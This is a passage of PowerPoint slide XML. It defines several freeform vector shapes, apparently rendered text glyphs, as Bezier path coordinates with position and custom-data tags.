                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="168"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1" name="Freeform 172">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687B9A5D-3126-4EE7-AEE5-66434BE7F9CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId73"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6419851" y="3065463"/>
              <a:ext cx="85725" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 119 w 204"/>
                <a:gd name="T1" fmla="*/ 20 h 304"/>
                <a:gd name="T2" fmla="*/ 99 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 304"/>
                <a:gd name="T4" fmla="*/ 20 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 304"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 15 h 304"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 30 h 304"/>
                <a:gd name="T10" fmla="*/ 85 w 204"/>
                <a:gd name="T11" fmla="*/ 30 h 304"/>
                <a:gd name="T12" fmla="*/ 85 w 204"/>
                <a:gd name="T13" fmla="*/ 274 h 304"/>
                <a:gd name="T14" fmla="*/ 20 w 204"/>
                <a:gd name="T15" fmla="*/ 274 h 304"/>
                <a:gd name="T16" fmla="*/ 0 w 204"/>
                <a:gd name="T17" fmla="*/ 289 h 304"/>
                <a:gd name="T18" fmla="*/ 20 w 204"/>
                <a:gd name="T19" fmla="*/ 304 h 304"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 304 h 304"/>
                <a:gd name="T22" fmla="*/ 204 w 204"/>
                <a:gd name="T23" fmla="*/ 289 h 304"/>
                <a:gd name="T24" fmla="*/ 184 w 204"/>
                <a:gd name="T25" fmla="*/ 274 h 304"/>
                <a:gd name="T26" fmla="*/ 119 w 204"/>
                <a:gd name="T27" fmla="*/ 274 h 304"/>
                <a:gd name="T28" fmla="*/ 119 w 204"/>
                <a:gd name="T29" fmla="*/ 2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304">
                  <a:moveTo>
                    <a:pt x="119" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="5"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="85" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="304"/>
                    <a:pt x="204" y="304"/>
                    <a:pt x="204" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="274"/>
                    <a:pt x="192" y="274"/>
                    <a:pt x="184" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="119" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="2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2" name="Freeform 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7411FB37-0DF3-459B-A03F-87DC99CE6C08}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId74"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6524626" y="3101975"/>
              <a:ext cx="100013" cy="146050"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 239"/>
                <a:gd name="T1" fmla="*/ 133 h 335"/>
                <a:gd name="T2" fmla="*/ 54 w 239"/>
                <a:gd name="T3" fmla="*/ 83 h 335"/>
                <a:gd name="T4" fmla="*/ 102 w 239"/>
                <a:gd name="T5" fmla="*/ 32 h 335"/>
                <a:gd name="T6" fmla="*/ 150 w 239"/>
                <a:gd name="T7" fmla="*/ 82 h 335"/>
                <a:gd name="T8" fmla="*/ 102 w 239"/>
                <a:gd name="T9" fmla="*/ 133 h 335"/>
                <a:gd name="T10" fmla="*/ 57 w 239"/>
                <a:gd name="T11" fmla="*/ 150 h 335"/>
                <a:gd name="T12" fmla="*/ 102 w 239"/>
                <a:gd name="T13" fmla="*/ 162 h 335"/>
                <a:gd name="T14" fmla="*/ 184 w 239"/>
                <a:gd name="T15" fmla="*/ 82 h 335"/>
                <a:gd name="T16" fmla="*/ 171 w 239"/>
                <a:gd name="T17" fmla="*/ 39 h 335"/>
                <a:gd name="T18" fmla="*/ 200 w 239"/>
                <a:gd name="T19" fmla="*/ 30 h 335"/>
                <a:gd name="T20" fmla="*/ 219 w 239"/>
                <a:gd name="T21" fmla="*/ 47 h 335"/>
                <a:gd name="T22" fmla="*/ 239 w 239"/>
                <a:gd name="T23" fmla="*/ 27 h 335"/>
                <a:gd name="T24" fmla="*/ 203 w 239"/>
                <a:gd name="T25" fmla="*/ 0 h 335"/>
                <a:gd name="T26" fmla="*/ 150 w 239"/>
                <a:gd name="T27" fmla="*/ 17 h 335"/>
                <a:gd name="T28" fmla="*/ 102 w 239"/>
                <a:gd name="T29" fmla="*/ 2 h 335"/>
                <a:gd name="T30" fmla="*/ 19 w 239"/>
                <a:gd name="T31" fmla="*/ 82 h 335"/>
                <a:gd name="T32" fmla="*/ 35 w 239"/>
                <a:gd name="T33" fmla="*/ 130 h 335"/>
                <a:gd name="T34" fmla="*/ 25 w 239"/>
                <a:gd name="T35" fmla="*/ 163 h 335"/>
                <a:gd name="T36" fmla="*/ 37 w 239"/>
                <a:gd name="T37" fmla="*/ 199 h 335"/>
                <a:gd name="T38" fmla="*/ 0 w 239"/>
                <a:gd name="T39" fmla="*/ 261 h 335"/>
                <a:gd name="T40" fmla="*/ 116 w 239"/>
                <a:gd name="T41" fmla="*/ 335 h 335"/>
                <a:gd name="T42" fmla="*/ 232 w 239"/>
                <a:gd name="T43" fmla="*/ 261 h 335"/>
                <a:gd name="T44" fmla="*/ 198 w 239"/>
                <a:gd name="T45" fmla="*/ 204 h 335"/>
                <a:gd name="T46" fmla="*/ 126 w 239"/>
                <a:gd name="T47" fmla="*/ 190 h 335"/>
                <a:gd name="T48" fmla="*/ 91 w 239"/>
                <a:gd name="T49" fmla="*/ 190 h 335"/>
                <a:gd name="T50" fmla="*/ 76 w 239"/>
                <a:gd name="T51" fmla="*/ 189 h 335"/>
                <a:gd name="T52" fmla="*/ 60 w 239"/>
                <a:gd name="T53" fmla="*/ 182 h 335"/>
                <a:gd name="T54" fmla="*/ 54 w 239"/>
                <a:gd name="T55" fmla="*/ 164 h 335"/>
                <a:gd name="T56" fmla="*/ 57 w 239"/>
                <a:gd name="T57" fmla="*/ 150 h 335"/>
                <a:gd name="T58" fmla="*/ 116 w 239"/>
                <a:gd name="T59" fmla="*/ 305 h 335"/>
                <a:gd name="T60" fmla="*/ 29 w 239"/>
                <a:gd name="T61" fmla="*/ 261 h 335"/>
                <a:gd name="T62" fmla="*/ 49 w 239"/>
                <a:gd name="T63" fmla="*/ 226 h 335"/>
                <a:gd name="T64" fmla="*/ 103 w 239"/>
                <a:gd name="T65" fmla="*/ 218 h 335"/>
                <a:gd name="T66" fmla="*/ 203 w 239"/>
                <a:gd name="T67" fmla="*/ 261 h 335"/>
                <a:gd name="T68" fmla="*/ 116 w 239"/>
                <a:gd name="T69" fmla="*/ 30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 h="335">
                  <a:moveTo>
                    <a:pt x="102" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="133"/>
                    <a:pt x="54" y="109"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="54"/>
                    <a:pt x="76" y="32"/>
                    <a:pt x="102" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="32"/>
                    <a:pt x="150" y="56"/>
                    <a:pt x="150" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="111"/>
                    <a:pt x="128" y="133"/>
                    <a:pt x="102" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="151"/>
                    <a:pt x="77" y="162"/>
                    <a:pt x="102" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="162"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="67"/>
                    <a:pt x="179" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="33"/>
                    <a:pt x="193" y="31"/>
                    <a:pt x="200" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="214" y="47"/>
                    <a:pt x="219" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="47"/>
                    <a:pt x="239" y="41"/>
                    <a:pt x="239" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="15"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="0"/>
                    <a:pt x="173" y="0"/>
                    <a:pt x="150" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="12"/>
                    <a:pt x="125" y="2"/>
                    <a:pt x="102" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="2"/>
                    <a:pt x="19" y="40"/>
                    <a:pt x="19" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="104"/>
                    <a:pt x="28" y="120"/>
                    <a:pt x="35" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="138"/>
                    <a:pt x="25" y="148"/>
                    <a:pt x="25" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="181"/>
                    <a:pt x="32" y="193"/>
                    <a:pt x="37" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="52" y="335"/>
                    <a:pt x="116" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="335"/>
                    <a:pt x="232" y="304"/>
                    <a:pt x="232" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="243"/>
                    <a:pt x="223" y="218"/>
                    <a:pt x="198" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="201"/>
                    <a:pt x="170" y="190"/>
                    <a:pt x="126" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="91" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="80" y="190"/>
                    <a:pt x="76" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="305"/>
                    <a:pt x="29" y="283"/>
                    <a:pt x="29" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="252"/>
                    <a:pt x="33" y="236"/>
                    <a:pt x="49" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="218"/>
                    <a:pt x="66" y="218"/>
                    <a:pt x="103" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="218"/>
                    <a:pt x="203" y="218"/>
                    <a:pt x="203" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="283"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="116" y="30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3" name="Freeform 174">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94B0F47D-8AF5-4EF6-AED4-966535A48C95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId75"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6634164" y="3101975"/>
              <a:ext cx="101600" cy="146050"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 240"/>
                <a:gd name="T1" fmla="*/ 133 h 335"/>
                <a:gd name="T2" fmla="*/ 54 w 240"/>
                <a:gd name="T3" fmla="*/ 83 h 335"/>
                <a:gd name="T4" fmla="*/ 102 w 240"/>
                <a:gd name="T5" fmla="*/ 32 h 335"/>
                <a:gd name="T6" fmla="*/ 150 w 240"/>
                <a:gd name="T7" fmla="*/ 82 h 335"/>
                <a:gd name="T8" fmla="*/ 102 w 240"/>
                <a:gd name="T9" fmla="*/ 133 h 335"/>
                <a:gd name="T10" fmla="*/ 57 w 240"/>
                <a:gd name="T11" fmla="*/ 150 h 335"/>
                <a:gd name="T12" fmla="*/ 102 w 240"/>
                <a:gd name="T13" fmla="*/ 162 h 335"/>
                <a:gd name="T14" fmla="*/ 184 w 240"/>
                <a:gd name="T15" fmla="*/ 82 h 335"/>
                <a:gd name="T16" fmla="*/ 171 w 240"/>
                <a:gd name="T17" fmla="*/ 39 h 335"/>
                <a:gd name="T18" fmla="*/ 200 w 240"/>
                <a:gd name="T19" fmla="*/ 30 h 335"/>
                <a:gd name="T20" fmla="*/ 220 w 240"/>
                <a:gd name="T21" fmla="*/ 47 h 335"/>
                <a:gd name="T22" fmla="*/ 240 w 240"/>
                <a:gd name="T23" fmla="*/ 27 h 335"/>
                <a:gd name="T24" fmla="*/ 203 w 240"/>
                <a:gd name="T25" fmla="*/ 0 h 335"/>
                <a:gd name="T26" fmla="*/ 151 w 240"/>
                <a:gd name="T27" fmla="*/ 17 h 335"/>
                <a:gd name="T28" fmla="*/ 102 w 240"/>
                <a:gd name="T29" fmla="*/ 2 h 335"/>
                <a:gd name="T30" fmla="*/ 20 w 240"/>
                <a:gd name="T31" fmla="*/ 82 h 335"/>
                <a:gd name="T32" fmla="*/ 36 w 240"/>
                <a:gd name="T33" fmla="*/ 130 h 335"/>
                <a:gd name="T34" fmla="*/ 26 w 240"/>
                <a:gd name="T35" fmla="*/ 163 h 335"/>
                <a:gd name="T36" fmla="*/ 37 w 240"/>
                <a:gd name="T37" fmla="*/ 199 h 335"/>
                <a:gd name="T38" fmla="*/ 0 w 240"/>
                <a:gd name="T39" fmla="*/ 261 h 335"/>
                <a:gd name="T40" fmla="*/ 117 w 240"/>
                <a:gd name="T41" fmla="*/ 335 h 335"/>
                <a:gd name="T42" fmla="*/ 233 w 240"/>
                <a:gd name="T43" fmla="*/ 261 h 335"/>
                <a:gd name="T44" fmla="*/ 198 w 240"/>
                <a:gd name="T45" fmla="*/ 204 h 335"/>
                <a:gd name="T46" fmla="*/ 126 w 240"/>
                <a:gd name="T47" fmla="*/ 190 h 335"/>
                <a:gd name="T48" fmla="*/ 91 w 240"/>
                <a:gd name="T49" fmla="*/ 190 h 335"/>
                <a:gd name="T50" fmla="*/ 77 w 240"/>
                <a:gd name="T51" fmla="*/ 189 h 335"/>
                <a:gd name="T52" fmla="*/ 60 w 240"/>
                <a:gd name="T53" fmla="*/ 182 h 335"/>
                <a:gd name="T54" fmla="*/ 54 w 240"/>
                <a:gd name="T55" fmla="*/ 164 h 335"/>
                <a:gd name="T56" fmla="*/ 57 w 240"/>
                <a:gd name="T57" fmla="*/ 150 h 335"/>
                <a:gd name="T58" fmla="*/ 117 w 240"/>
                <a:gd name="T59" fmla="*/ 305 h 335"/>
                <a:gd name="T60" fmla="*/ 29 w 240"/>
                <a:gd name="T61" fmla="*/ 261 h 335"/>
                <a:gd name="T62" fmla="*/ 50 w 240"/>
                <a:gd name="T63" fmla="*/ 226 h 335"/>
                <a:gd name="T64" fmla="*/ 103 w 240"/>
                <a:gd name="T65" fmla="*/ 218 h 335"/>
                <a:gd name="T66" fmla="*/ 204 w 240"/>
                <a:gd name="T67" fmla="*/ 261 h 335"/>
                <a:gd name="T68" fmla="*/ 117 w 240"/>
                <a:gd name="T69" fmla="*/ 30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0" h="335">
                  <a:moveTo>
                    <a:pt x="102" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="133"/>
                    <a:pt x="54" y="109"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="54"/>
                    <a:pt x="76" y="32"/>
                    <a:pt x="102" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="32"/>
                    <a:pt x="150" y="56"/>
                    <a:pt x="150" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="111"/>
                    <a:pt x="128" y="133"/>
                    <a:pt x="102" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="151"/>
                    <a:pt x="78" y="162"/>
                    <a:pt x="102" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="162"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="67"/>
                    <a:pt x="180" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="33"/>
                    <a:pt x="194" y="31"/>
                    <a:pt x="200" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="215" y="47"/>
                    <a:pt x="220" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="47"/>
                    <a:pt x="240" y="41"/>
                    <a:pt x="240" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="15"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="0"/>
                    <a:pt x="173" y="0"/>
                    <a:pt x="151" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="12"/>
                    <a:pt x="125" y="2"/>
                    <a:pt x="102" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="2"/>
                    <a:pt x="20" y="40"/>
                    <a:pt x="20" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="104"/>
                    <a:pt x="28" y="120"/>
                    <a:pt x="36" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="138"/>
                    <a:pt x="26" y="148"/>
                    <a:pt x="26" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="181"/>
                    <a:pt x="33" y="193"/>
                    <a:pt x="37" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="53" y="335"/>
                    <a:pt x="117" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="335"/>
                    <a:pt x="233" y="304"/>
                    <a:pt x="233" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="243"/>
                    <a:pt x="224" y="218"/>
                    <a:pt x="198" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="201"/>
                    <a:pt x="171" y="190"/>
                    <a:pt x="126" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="91" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="81" y="190"/>
                    <a:pt x="77" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="117" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="305"/>
                    <a:pt x="29" y="283"/>
                    <a:pt x="29" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="252"/>
                    <a:pt x="34" y="236"/>
                    <a:pt x="50" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="218"/>
                    <a:pt x="67" y="218"/>
                    <a:pt x="103" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="218"/>
                    <a:pt x="204" y="218"/>
                    <a:pt x="204" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="283"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="117" y="30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4" name="Freeform 175">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1755B99E-216F-4226-8837-754B069AA6B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId76"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2543176" y="3338513"/>
              <a:ext cx="87313" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 194 w 206"/>
                <a:gd name="T1" fmla="*/ 34 h 249"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 18 h 249"/>
                <a:gd name="T4" fmla="*/ 188 w 206"/>
                <a:gd name="T5" fmla="*/ 0 h 249"/>
                <a:gd name="T6" fmla="*/ 175 w 206"/>
                <a:gd name="T7" fmla="*/ 5 h 249"/>
                <a:gd name="T8" fmla="*/ 11 w 206"/>
                <a:gd name="T9" fmla="*/ 108 h 249"/>
                <a:gd name="T10" fmla="*/ 0 w 206"/>
                <a:gd name="T11" fmla="*/ 125 h 249"/>
                <a:gd name="T12" fmla="*/ 9 w 206"/>
                <a:gd name="T13" fmla="*/ 140 h 249"/>
                <a:gd name="T14" fmla="*/ 175 w 206"/>
                <a:gd name="T15" fmla="*/ 245 h 249"/>
                <a:gd name="T16" fmla="*/ 188 w 206"/>
                <a:gd name="T17" fmla="*/ 249 h 249"/>
                <a:gd name="T18" fmla="*/ 206 w 206"/>
                <a:gd name="T19" fmla="*/ 232 h 249"/>
                <a:gd name="T20" fmla="*/ 194 w 206"/>
                <a:gd name="T21" fmla="*/ 215 h 249"/>
                <a:gd name="T22" fmla="*/ 51 w 206"/>
                <a:gd name="T23" fmla="*/ 125 h 249"/>
                <a:gd name="T24" fmla="*/ 194 w 206"/>
                <a:gd name="T25" fmla="*/ 3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49">
                  <a:moveTo>
                    <a:pt x="194" y="34"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="31"/>
                    <a:pt x="206" y="27"/>
                    <a:pt x="206" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="6"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="188" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="0"/>
                    <a:pt x="182" y="1"/>
                    <a:pt x="175" y="5"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11" y="108"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="111"/>
                    <a:pt x="0" y="115"/>
                    <a:pt x="0" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="131"/>
                    <a:pt x="4" y="137"/>
                    <a:pt x="9" y="140"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="175" y="245"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="249"/>
                    <a:pt x="184" y="249"/>
                    <a:pt x="188" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="249"/>
                    <a:pt x="206" y="244"/>
                    <a:pt x="206" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="223"/>
                    <a:pt x="199" y="219"/>
                    <a:pt x="194" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="51" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="3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5" name="Freeform 176">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99720520-EDF6-49C5-8138-10E375B2CD00}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
